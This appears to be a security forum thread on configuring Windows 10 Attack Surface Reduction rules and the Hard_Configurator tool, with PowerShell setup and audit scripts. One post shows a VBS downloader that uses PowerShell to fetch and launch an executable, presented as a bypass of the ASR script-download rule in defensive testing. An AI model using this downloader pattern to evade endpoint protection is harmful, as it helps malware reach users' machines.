Andy Ful

Level 33
Content Creator
Verified
Joined
Dec 23, 2014
Messages
2,233
Operating System
Windows 10
Antivirus
Windows Defender

It seems that the Attack Surface Reduction introduced in Windows 10 Fall Creators Update also works in the Windows Home version. It can be configured using PowerShell.
The bad news is that the rule 'Block Office applications from creating child processes' does not work with Microsoft Office 2007 and Open Office. It works well with Microsoft Office 2016.
So it is possible that the ASR features below:
  • Block Office applications from creating child processes
  • Block Office applications from creating executable content
  • Block Office applications from injecting into other processes
  • Block Win32 imports from Macro code in Office
will work only with the Office software still supported by Microsoft (MS Office 2010, 2013, 2016).
Unfortunately, I cannot test it for MS Office 2010 and MS Office 2013. If someone can, then please let me know.
Here is the link to docs.microsoft.com article:
Use Attack surface reduction rules to prevent malware infection
It follows from it that ASR applies to:
  • Windows 10, version 1709 (and later)
  • Microsoft Office 365
  • Microsoft Office 2016
  • Microsoft Office 2013
  • Microsoft Office 2010
The bad thing is that the ASR rule 'Impede JavaScript and VBScript to launch executables' also seems not to work outside Microsoft Office.
After setting the ASR rules:
Code:
Set-MpPreference -AttackSurfaceReductionRules_Ids BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550,D4F940AB-401B-4EFC-AADC-AD5F3C50688A,3B576869-A4EC-4529-8536-B80A7769E899,75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84,D3E037E1-3EB8-44C8-A917-57927947596D,5BEB7EFE-FD9A-4556-801D-275E5FFC04CC,92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B -AttackSurfaceReductionRules_Actions Enabled,Enabled,Enabled,Enabled,Enabled,Enabled,Enabled
I can still successfully run eso.exe via the simple RunEso.vbs script:
Code:
' Launch an executable that is already on disk through the WScript.Shell object
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run("c:\z\eso.exe")
WScript.Quit
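As an added example (not code from the post above and not part of Hard_Configurator), here is the same rule set applied one rule at a time and then read back, so you can see which rules are active and in which mode. It assumes an elevated PowerShell on Windows 10 1709 or later with Windows Defender Antivirus as the active engine; the rule names next to the GUIDs are the descriptions Microsoft uses in its ASR documentation.

```powershell
# Added example, not code from the thread or from Hard_Configurator.
# Enables the seven ASR rules from the post one at a time and reads the
# resulting state back. Requires an elevated PowerShell on Windows 10 1709+
# with Windows Defender Antivirus active.
# Rule names are the descriptions used in Microsoft's ASR documentation.

$AsrRules = [ordered]@{
    'BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550' = 'Block executable content from email client and webmail'
    'D4F940AB-401B-4EFC-AADC-AD5F3C50688A' = 'Block all Office applications from creating child processes'
    '3B576869-A4EC-4529-8536-B80A7769E899' = 'Block Office applications from creating executable content'
    '75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84' = 'Block Office applications from injecting code into other processes'
    'D3E037E1-3EB8-44C8-A917-57927947596D' = 'Block JavaScript or VBScript from launching downloaded executable content'
    '5BEB7EFE-FD9A-4556-801D-275E5FFC04CC' = 'Block execution of potentially obfuscated scripts'
    '92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B' = 'Block Win32 API calls from Office macros'
}

# Numeric values Defender stores for each rule action.
$ActionName = @{ 0 = 'Disabled'; 1 = 'Enabled'; 2 = 'AuditMode' }

function Set-AsrRules {
    param(
        [ValidateSet('Disabled', 'Enabled', 'AuditMode')]
        [string]$Mode = 'AuditMode'
    )
    # Add-MpPreference adds to (or updates) the rule list instead of replacing it,
    # so rules configured elsewhere are preserved. Set-MpPreference, as used in
    # the post, replaces the whole list with exactly what you pass it.
    foreach ($id in $AsrRules.Keys) {
        Add-MpPreference -AttackSurfaceReductionRules_Ids $id `
                         -AttackSurfaceReductionRules_Actions $Mode
    }
}

function Get-AsrRuleState {
    # Get-MpPreference returns two parallel arrays: rule IDs and their actions.
    $pref    = Get-MpPreference
    $ids     = @($pref.AttackSurfaceReductionRules_Ids)
    $actions = @($pref.AttackSurfaceReductionRules_Actions)
    for ($i = 0; $i -lt $ids.Count; $i++) {
        $id   = $ids[$i].ToString().ToUpper()
        $name = '(not in this table)'
        if ($AsrRules.Contains($id)) { $name = $AsrRules[$id] }
        [pscustomobject]@{
            RuleId = $id
            Action = $ActionName[[int]($actions[$i])]
            Name   = $name
        }
    }
}

# Usage: start in audit mode, watch event ID 1122 in the
# 'Microsoft-Windows-Windows Defender/Operational' log for a while,
# then switch to -Mode Enabled once nothing you rely on shows up there.
Set-AsrRules -Mode AuditMode
Get-AsrRuleState | Format-Table -AutoSize
```

Audit mode first is the safer order on a Home machine where you cannot stage the change through Group Policy: a rule that fires on Office 2007 or on a script you actually use shows up as event 1122 without breaking anything.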
 

Andy Ful

In fact, the ASR rule 'Impede JavaScript and VBScript to launch executables' also has another, more appropriate description: 'Block JavaScript or VBScript from launching downloaded executable content'.
So it cannot block the script from executing files that are already on the disk, but it can block some script trojan downloaders. That feature works independently of Microsoft Office.
The bad thing is that I managed to bypass this ASR rule using this VBS script trojan downloader:
Code:
' Download the file with PowerShell instead of from the script itself,
' then launch it from the script after giving the download time to finish
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run("c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -command (New-Object System.Net.WebClient).DownloadFile('https://kcsoftwares.com/files/sumo_lite.exe','C:\Users\Public\Downloads\sumo_lite.exe')")
WScript.Sleep(10000)
WshShell.Run("C:\Users\Public\Downloads\sumo_lite.exe")
WScript.Quit
The downloaded/executed file is a harmless SUMO lite installer from the developer site. The analogous script without PowerShell is blocked by ASR (no file is downloaded).
Poll - Who has already played with new W10 security features?
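Two checks worth running after a test like the one above, as an added example that is not code from the post: first, pull the ASR block/audit events for the JavaScript/VBScript rule out of the Defender operational log so you can see what the rule actually fired on; second, look at whether the file the script downloaded carries a Zone.Identifier (Mark-of-the-Web) stream, which is one way Windows records that a file came from the Internet, and a reasonable first thing to compare between the blocked and the bypassing variant. The file path is the one used in the post; the rule GUID is the documented ID for 'Block JavaScript or VBScript from launching downloaded executable content'.

```powershell
# Added example, not code from the post.
# (1) List what ASR rule D3E037E1 (JavaScript/VBScript launching downloaded
#     executable content) blocked or audited, from the Defender operational log.
# (2) Check whether the downloaded test file carries a Zone.Identifier stream.
# $TestFile is the path used in the post; adjust it for your own test.

$JsVbsRule = 'D3E037E1-3EB8-44C8-A917-57927947596D'
$TestFile  = 'C:\Users\Public\Downloads\sumo_lite.exe'

function Get-AsrEvents {
    param([int]$Hours = 24)
    # 1121 = a rule blocked something, 1122 = a rule would have blocked (audit mode).
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 1121, 1122
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Pull every EventData field out of the XML so the output does not depend
        # on exact field names, which differ between Defender versions.
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        $mode = 'Audited'
        if ($_.Id -eq 1121) { $mode = 'Blocked' }
        [pscustomobject]@{
            Time   = $_.TimeCreated
            Mode   = $mode
            # The rule ID is the one EventData value shaped like a GUID.
            RuleId = ($data.Values | Where-Object { $_ -match '^[0-9A-F-]{36}$' } | Select-Object -First 1)
            Detail = (($data.GetEnumerator() | ForEach-Object { "$($_.Key)=$($_.Value)" }) -join '; ')
        }
    }
}

function Test-MarkOfTheWeb {
    param([string]$Path)
    if (-not (Test-Path $Path)) { return "$Path not found" }
    # The Zone.Identifier alternate data stream records the security zone a file
    # was obtained from (ZoneId=3 is the Internet zone).
    $motw = Get-Content -Path $Path -Stream Zone.Identifier -ErrorAction SilentlyContinue
    if ($motw) { return "MOTW present:`n" + ($motw -join "`n") }
    return 'No Zone.Identifier stream on this file'
}

Get-AsrEvents | Where-Object { $_.RuleId -eq $JsVbsRule } | Format-List
Test-MarkOfTheWeb -Path $TestFile
```

Run the blocked variant and the PowerShell variant back to back and compare both outputs: whether an 1121 event was written at all, and whether the file on disk has the stream. That tells you which part of the chain the rule is actually keying on, rather than guessing from the one-line rule description.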
 

Andy Ful

How can the average user of Hard Config keep notified about new versions?
I am on v. 3.1.0.0
The problem is that Hard_Configurator does not look outside the computer (no external connections). I was thinking about adding a <Check for updates> button. That option could check for new versions of the program. :)
 

Andy Ful

I am now working on a Hard_Configurator extension, a tool to configure Windows Defender on Windows 10 FCU Home versions (ASR rules + exclusions). It contains the rules used by @Av Gurus (16 rules + ASR rules), but it cannot be used on Windows Pro, because the PowerShell Set-MpPreference cmdlet used to apply those settings can be overridden by existing Defender Group Policy rules. I have to solve this issue, because this tool is far more convenient than using gpedit.msc.
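The override problem is easy to detect before it bites. As an added example (my code, not part of Hard_Configurator), the script below reads the registry key that the 'Configure Attack Surface Reduction rules' Group Policy setting writes, as documented by Microsoft for ASR, and lists every rule that policy manages, since those are exactly the rules whose Set-MpPreference value will be reset at the next policy refresh. The registry path is taken from Microsoft's ASR Group Policy documentation; verify it on your build before relying on it.

```powershell
# Added example, not code from the post or from Hard_Configurator.
# Finds ASR rules that are managed by Group Policy on Windows Pro/Enterprise.
# Any rule present under the policy key is reapplied from policy at the next
# refresh (gpupdate or the periodic background refresh), regardless of what
# Set-MpPreference / Add-MpPreference were told in the meantime.
# Registry path per Microsoft's ASR Group Policy documentation (assumption:
# verify on your own build).

$PolicyRulesKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules'
$ActionName     = @{ 0 = 'Disabled'; 1 = 'Enabled'; 2 = 'AuditMode' }

function Get-AsrPolicyRules {
    # Returns @{ RuleId = ActionNumber } from the policy key, or an empty table
    # when no Group Policy ASR configuration exists on this machine.
    $result = @{}
    if (-not (Test-Path $PolicyRulesKey)) { return $result }
    $item = Get-Item $PolicyRulesKey
    foreach ($name in $item.GetValueNames()) {
        # Policy stores the action as a string value ("0", "1" or "2"), keyed by rule GUID.
        $result[$name.ToUpper()] = [int]$item.GetValue($name)
    }
    return $result
}

function Test-AsrPolicyOverride {
    $policy = Get-AsrPolicyRules
    if ($policy.Count -eq 0) {
        Write-Host 'No ASR rules are set by Group Policy; Set-MpPreference values will stick.'
        return
    }
    # Get-MpPreference reports the effective (merged) state, so right after a
    # local change any mismatch below is the change policy will undo.
    $pref    = Get-MpPreference
    $ids     = @($pref.AttackSurfaceReductionRules_Ids | ForEach-Object { $_.ToString().ToUpper() })
    $actions = @($pref.AttackSurfaceReductionRules_Actions)
    foreach ($id in $policy.Keys) {
        $effective = '(absent locally)'
        $idx = [array]::IndexOf($ids, $id)
        if ($idx -ge 0) { $effective = $ActionName[[int]($actions[$idx])] }
        [pscustomobject]@{
            RuleId    = $id
            Policy    = $ActionName[$policy[$id]]
            Effective = $effective
            Managed   = 'Group Policy (local changes will be reverted)'
        }
    }
}

Test-AsrPolicyOverride | Format-Table -AutoSize
```

On a machine where this prints anything, set the corresponding GPO entries back to Not Configured (or remove the rule values under that key) before using a Set-MpPreference based tool, or the two will keep fighting each refresh cycle.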
 

steel9

Level 4
Verified
Joined
Jun 23, 2017
Messages
179
Operating System
Windows 10
Antivirus
Kaspersky
Any plans to release the source code on GitHub? I mean for people worried about downloading unsigned applications xD
 

Andy Ful

Any plans to release the source code on GitHub? I mean for people worried about downloading unsigned applications xD
Here is the link:
Hard_Configurator---old-versions/Hard_Configurator_3.1.0.0_sources.zip at master · AndyFul/Hard_Configurator---old-versions · GitHub
The Hard_Configurator folder must be copied to the Windows folder! One can compile the executable manually using AutoIt: only the file Hard_Configurator.au3 has to be compiled; the rest is added during the compilation process.
The code is not properly commented and is not optimized. It also uses some open-source functions made by members of the AutoIt Forums (Ascend4nt, Erik Pilsits, FredAI, Melba23, trancexx, Valuater).
 
Joined
Jun 12, 2017
Messages
24
I've been following your work on Hard_Configurator for some time and have been using SRP on Pro versions of Windows since Vista days. My "mentor" with SRP was mechBgon, an early detailer of how to set up SRP. Never had any known malware since. While your work seems to be towards using H_C on Home versions, I was wondering if it is applicable for Pro versions as well? I was toying with trying it on a Pro version in place of my custom mechBgon installs. Would it work? Your thoughts?
 

Andy Ful

I've been following your work on Hard_Configurator for some time and have been using SRP on Pro versions of Windows since Vista Days. My "mentor" with SRP was mechBgon, an early detailer of how to set up SRP. Never had any known malware since. While your work seems to be towards using H_C on Home versions, I was wondering if it is applicable for Pro versions as well? I was toying with trying it on a Pro version in place of my custom mechBgon installs. Would it work? Your thoughts.
The SRP part of Hard_Configurator will work, but you have to reset SRP:
  1. Use gpedit.msc to remove SRP from GPO.
  2. If you configured SRP when not using Group Policies (SSRP or reg tweaks), then simply press <Recommended SRP> button in Hard_Configurator.
The problem with other GPO settings is that they are refreshed in the Registry every day. This can overwrite the Hard_Configurator settings. Simply look at the Hard_Configurator settings after a day or two. If any setting changes its value, then it is a sign that you have already activated this setting in GPO. If so, it should be set to the unconfigured state. If you have any problem, just post here. :)
 

steel9

The x86 installer was detected as malware by multiple scanners. I submitted false positive reports to some of them, but according to Avast it was not a false positive.

"
Hello,

Thank you for reporting this.

Our virus specialists have confirmed that this detection is indeed correct due to lack of compliance with our clean software policy.

You can find further details in the following article: Avast Clean Guidelines.


With regards,

Avast Customer Care
"

I asked them why, but they haven't responded yet.